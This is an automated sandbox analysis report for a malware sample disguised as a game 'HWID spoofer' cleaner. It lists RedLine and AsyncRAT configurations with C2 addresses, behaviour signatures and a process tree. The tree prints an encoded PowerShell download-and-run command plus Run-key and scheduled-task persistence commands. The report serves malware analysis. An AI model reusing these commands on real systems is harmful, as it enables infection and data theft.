Resubmissions
08-04-2023 15:54
230408-tcfdvsdh99 728-01-2023 14:39
230128-r1rqpagf4t 1028-01-2023 12:12
230128-pdd5zaeg48 1028-01-2023 11:33
230128-npbcsagb5w 1028-01-2023 11:17
230128-ndt1ragb3x 10Analysis
-
max time kernel
179s -
max time network
180s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
28-01-2023 12:12
Static task
static1
Behavioral task
behavioral1
Sample
Hwid Spoofer Eac Rust Cleanernls..scr
Resource
win10v2004-20221111-en
General
-
Target
Hwid Spoofer Eac Rust Cleanernls..scr
-
Size
658KB
-
MD5
556084cf64aec63e0babdf10a61afaa6
-
SHA1
b7fa21295db0657d1767c05bb440b218cecdf521
-
SHA256
d016fcbdb988d56df4c26d75a12e87a61010ed2366b52eefb8b409a1d8bcbaab
-
SHA512
6c896594ea47228f71f1dea7d9fd9f9842b5f178748a39c785ded34fb9dfd574c9bd781f1f65176e436453257078255803d729b79d823c01c6629fddfb3ce33e
-
SSDEEP
12288:LC/74rdbHgVBnqvFprkrUolVATWZXYm7ljg9hG80NEKXo1Y1UHC+O:LC/UGTWrkrUovUKfhkQNEwUnO
Malware Config
Extracted
redline
ff
51.103.208.104:53200
Extracted
asyncrat
0.5.7B
WHostProjess
95.70.151.185:8805
WHostProjess
-
delay
3
-
install
false
-
install_file
WHostProjess
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
SecurityHealthService
20.4.6.16:43521
SecurityHealthService
-
delay
3
-
install
false
-
install_file
SecurityHealthService
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
WindoosDGuard
20.4.6.16:43521
WindoosDGuard
-
delay
3
-
install
false
-
install_file
WindoosDGuard
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
DefenderSmartScren
217.64.31.3:8437
DefenderSmartScren
-
delay
3
-
install
false
-
install_file
SecurityHealtheurvice.exe
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
-
delay
3
-
install
false
-
install_file
System Guard Runtime
-
install_folder
%AppData%
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3404-157-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Async RAT payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/5984-278-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/2716-326-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/3412-372-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/5528-380-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/5496-388-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 45 2468 powershell.exe 57 4896 powershell.exe 61 5036 powershell.exe 67 1804 powershell.exe 68 3552 powershell.exe 71 1028 powershell.exe 74 4360 powershell.exe 75 1628 powershell.exe 79 5244 powershell.exe 82 4520 powershell.exe 87 1276 powershell.exe 89 5280 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 30 IoCs
Processes:
HJDS32.EXE0.exeh8vHNS7mlJ.exe1VJRcYlIp3.exeCSiI2cJakt.exeHHARrI0l8D.exeDs1LDOEyjt.exeGjKI4UESBN.exexhE0ft0B5U.exeS48sKmJLIF.exeTBvbn5FGMT.exepI7A0t4Z9N.exewhwbnynKNT.exe1kpScgE4PS.exe2.exe3.exe4.exe5.exe5.exe6.exe7.exe8.exe9.exe10.exe11.exe3.exe12.exe13.exe6.exepid process 2012 HJDS32.EXE 4968 0.exe 1608 h8vHNS7mlJ.exe 2744 1VJRcYlIp3.exe 2640 CSiI2cJakt.exe 4792 HHARrI0l8D.exe 3508 Ds1LDOEyjt.exe 2236 GjKI4UESBN.exe 2652 xhE0ft0B5U.exe 1316 S48sKmJLIF.exe 1592 TBvbn5FGMT.exe 4532 pI7A0t4Z9N.exe 2652 xhE0ft0B5U.exe 1652 whwbnynKNT.exe 4784 1kpScgE4PS.exe 5868 2.exe 5180 3.exe 4564 4.exe 2280 5.exe 5948 5.exe 5868 6.exe 4836 7.exe 5144 8.exe 5216 9.exe 3824 10.exe 5880 11.exe 2768 3.exe 4592 12.exe 2468 13.exe 3192 6.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\HJDS32.EXE upx C:\Users\Admin\AppData\Roaming\HJDS32.EXE upx behavioral1/memory/2012-143-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmp upx behavioral1/memory/2012-146-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\0.exe upx C:\Users\Admin\AppData\Local\Temp\0.exe upx behavioral1/memory/4968-150-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmp upx behavioral1/memory/4968-238-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmp upx -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RegAsm.exeDs1LDOEyjt.exeGjKI4UESBN.exexhE0ft0B5U.exeTBvbn5FGMT.exe1kpScgE4PS.exewhwbnynKNT.exe1VJRcYlIp3.exeCSiI2cJakt.exeHHARrI0l8D.exeS48sKmJLIF.exepI7A0t4Z9N.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation Ds1LDOEyjt.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation GjKI4UESBN.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation xhE0ft0B5U.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation TBvbn5FGMT.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation 1kpScgE4PS.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation whwbnynKNT.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation 1VJRcYlIp3.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation CSiI2cJakt.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation HHARrI0l8D.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation S48sKmJLIF.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation pI7A0t4Z9N.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
powershell.exepowershell.exe5.exe7.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WHost = "C:\\Users\\Admin\\AppData\\Roaming\\WHost\\WHost.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zXQYDaStND = "C:\\Users\\Admin\\AppData\\Roaming\\yQKALotXEZ\\wXDStJGKiy.exe" 5.exe Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe" 7.exe Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 12 IoCs
Processes:
Hwid Spoofer Eac Rust Cleanernls..scrh8vHNS7mlJ.exe2.exe4.exe5.exe3.exe6.exe10.exe13.exe11.exe3.exe12.exedescription pid process target process PID 1480 set thread context of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1608 set thread context of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 5868 set thread context of 5984 5868 2.exe RegAsm.exe PID 4564 set thread context of 2716 4564 4.exe RegAsm.exe PID 2280 set thread context of 5948 2280 5.exe 5.exe PID 5180 set thread context of 5916 5180 3.exe RegAsm.exe PID 5868 set thread context of 3412 5868 6.exe RegAsm.exe PID 3824 set thread context of 5528 3824 10.exe RegAsm.exe PID 2468 set thread context of 5496 2468 13.exe RegAsm.exe PID 5880 set thread context of 5704 5880 11.exe RegAsm.exe PID 2768 set thread context of 5756 2768 3.exe RegAsm.exe PID 4592 set thread context of 5104 4592 12.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5176 5144 WerFault.exe 8.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6096 schtasks.exe 4772 schtasks.exe 1876 schtasks.exe 1168 schtasks.exe -
Modifies registry class 3 IoCs
Processes:
RegAsm.exeOpenWith.exetaskmgr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings RegAsm.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Hwid Spoofer Eac Rust Cleanernls..scrpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exepid process 1480 Hwid Spoofer Eac Rust Cleanernls..scr 1480 Hwid Spoofer Eac Rust Cleanernls..scr 2468 powershell.exe 2468 powershell.exe 4896 powershell.exe 4896 powershell.exe 5036 powershell.exe 5036 powershell.exe 1804 powershell.exe 1804 powershell.exe 2468 powershell.exe 2468 powershell.exe 3552 powershell.exe 3552 powershell.exe 4896 powershell.exe 4896 powershell.exe 1804 powershell.exe 5036 powershell.exe 5036 powershell.exe 1028 powershell.exe 1028 powershell.exe 4360 powershell.exe 4360 powershell.exe 3552 powershell.exe 1628 powershell.exe 1628 powershell.exe 4036 taskmgr.exe 4036 taskmgr.exe 4520 powershell.exe 4520 powershell.exe 1276 powershell.exe 1276 powershell.exe 1028 powershell.exe 4520 powershell.exe 4360 powershell.exe 1628 powershell.exe 5244 powershell.exe 5244 powershell.exe 5280 powershell.exe 5280 powershell.exe 4036 taskmgr.exe 1276 powershell.exe 5244 powershell.exe 5280 powershell.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 5920 powershell.exe 5920 powershell.exe 5920 powershell.exe 4036 taskmgr.exe 3404 RegAsm.exe 3404 RegAsm.exe 3404 RegAsm.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 4036 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
Hwid Spoofer Eac Rust Cleanernls..scrpowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe5.exe3.exe6.exepowershell.exepowershell.exe11.exe3.exe12.exedescription pid process Token: SeDebugPrivilege 1480 Hwid Spoofer Eac Rust Cleanernls..scr Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 3404 RegAsm.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 4036 taskmgr.exe Token: SeSystemProfilePrivilege 4036 taskmgr.exe Token: SeCreateGlobalPrivilege 4036 taskmgr.exe Token: SeDebugPrivilege 4520 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 5244 powershell.exe Token: SeDebugPrivilege 5280 powershell.exe Token: SeDebugPrivilege 5920 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 2280 5.exe Token: SeDebugPrivilege 5180 3.exe Token: SeDebugPrivilege 5868 6.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 5896 powershell.exe Token: SeDebugPrivilege 5880 11.exe Token: SeDebugPrivilege 2768 3.exe Token: SeDebugPrivilege 4592 12.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe 4036 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OpenWith.exepid process 388 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Hwid Spoofer Eac Rust Cleanernls..scrRegAsm.exeHJDS32.EXEcmd.exe0.execmd.exeh8vHNS7mlJ.execmd.execmd.exe1VJRcYlIp3.execmd.exeCSiI2cJakt.execmd.exeHHARrI0l8D.execmd.exeDs1LDOEyjt.exedescription pid process target process PID 1480 wrote to memory of 1036 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 1036 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 1036 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 1480 wrote to memory of 2264 1480 Hwid Spoofer Eac Rust Cleanernls..scr RegAsm.exe PID 2264 wrote to memory of 2012 2264 RegAsm.exe HJDS32.EXE PID 2264 wrote to memory of 2012 2264 RegAsm.exe HJDS32.EXE PID 2012 wrote to memory of 4292 2012 HJDS32.EXE cmd.exe PID 2012 wrote to memory of 4292 2012 HJDS32.EXE cmd.exe PID 4292 wrote to memory of 4968 4292 cmd.exe 0.exe PID 4292 wrote to memory of 4968 4292 cmd.exe 0.exe PID 4968 wrote to memory of 2704 4968 0.exe cmd.exe PID 4968 wrote to memory of 2704 4968 0.exe cmd.exe PID 2704 wrote to memory of 1608 2704 cmd.exe h8vHNS7mlJ.exe PID 2704 wrote to memory of 1608 2704 cmd.exe h8vHNS7mlJ.exe PID 2704 wrote to memory of 1608 2704 cmd.exe h8vHNS7mlJ.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 1608 wrote to memory of 3404 1608 h8vHNS7mlJ.exe RegAsm.exe PID 4968 wrote to memory of 4192 4968 0.exe cmd.exe PID 4968 wrote to memory of 4192 4968 0.exe cmd.exe PID 4192 wrote to memory of 2744 4192 cmd.exe 1VJRcYlIp3.exe PID 4192 wrote to memory of 2744 4192 cmd.exe 1VJRcYlIp3.exe PID 4968 wrote to memory of 3408 4968 0.exe cmd.exe PID 4968 wrote to memory of 3408 4968 0.exe cmd.exe PID 3408 wrote to memory of 2640 3408 cmd.exe CSiI2cJakt.exe PID 3408 wrote to memory of 2640 3408 cmd.exe CSiI2cJakt.exe PID 4968 wrote to memory of 512 4968 0.exe cmd.exe PID 4968 wrote to memory of 512 4968 0.exe cmd.exe PID 2744 wrote to memory of 2468 2744 1VJRcYlIp3.exe powershell.exe PID 2744 wrote to memory of 2468 2744 1VJRcYlIp3.exe powershell.exe PID 4968 wrote to memory of 1396 4968 0.exe cmd.exe PID 4968 wrote to memory of 1396 4968 0.exe cmd.exe PID 512 wrote to memory of 4792 512 cmd.exe HHARrI0l8D.exe PID 512 wrote to memory of 4792 512 cmd.exe HHARrI0l8D.exe PID 2640 wrote to memory of 4896 2640 CSiI2cJakt.exe powershell.exe PID 2640 wrote to memory of 4896 2640 CSiI2cJakt.exe powershell.exe PID 4968 wrote to memory of 4016 4968 0.exe cmd.exe PID 4968 wrote to memory of 4016 4968 0.exe cmd.exe PID 1396 wrote to memory of 3508 1396 cmd.exe Ds1LDOEyjt.exe PID 1396 wrote to memory of 3508 1396 cmd.exe Ds1LDOEyjt.exe PID 4968 wrote to memory of 1344 4968 0.exe cmd.exe PID 4968 wrote to memory of 1344 4968 0.exe cmd.exe PID 4792 wrote to memory of 5036 4792 HHARrI0l8D.exe powershell.exe PID 4792 wrote to memory of 5036 4792 HHARrI0l8D.exe powershell.exe PID 4016 wrote to memory of 2236 4016 cmd.exe GjKI4UESBN.exe PID 4016 wrote to memory of 2236 4016 cmd.exe GjKI4UESBN.exe PID 4968 wrote to memory of 3412 4968 0.exe cmd.exe PID 4968 wrote to memory of 3412 4968 0.exe cmd.exe PID 3508 wrote to memory of 1804 3508 Ds1LDOEyjt.exe powershell.exe PID 3508 wrote to memory of 1804 3508 Ds1LDOEyjt.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleanernls..scr"C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleanernls..scr" /S1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\HJDS32.EXE"C:\Users\Admin\AppData\Roaming\HJDS32.EXE"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\0.exeC:\Users\Admin\AppData\Local\Temp\0.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\h8vHNS7mlJ.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\h8vHNS7mlJ.exeC:\Users\Admin\AppData\Local\Temp\h8vHNS7mlJ.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\1VJRcYlIp3.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1VJRcYlIp3.exeC:\Users\Admin\AppData\Local\Temp\1VJRcYlIp3.exe7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAegBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAyADYAMwAzADkAMAA5ADkAMAAzADYANgAvAFcASABvAHMAdAAuAGUAeABlACcALAAgADwAIwB0AGMAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AagB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAcAB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAdgBrAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgByAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAegBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAHgAagB1ACMAPgA="8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2.exe"C:\Users\Admin\AppData\Roaming\2.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost' -Value '"C:\Users\Admin\AppData\Roaming\WHost\WHost.exe"' -PropertyType 'String'10⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd10⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \WHost /tr "C:\Users\Admin\AppData\Roaming\WHost\WHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f10⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\CSiI2cJakt.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CSiI2cJakt.exeC:\Users\Admin\AppData\Local\Temp\CSiI2cJakt.exe7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
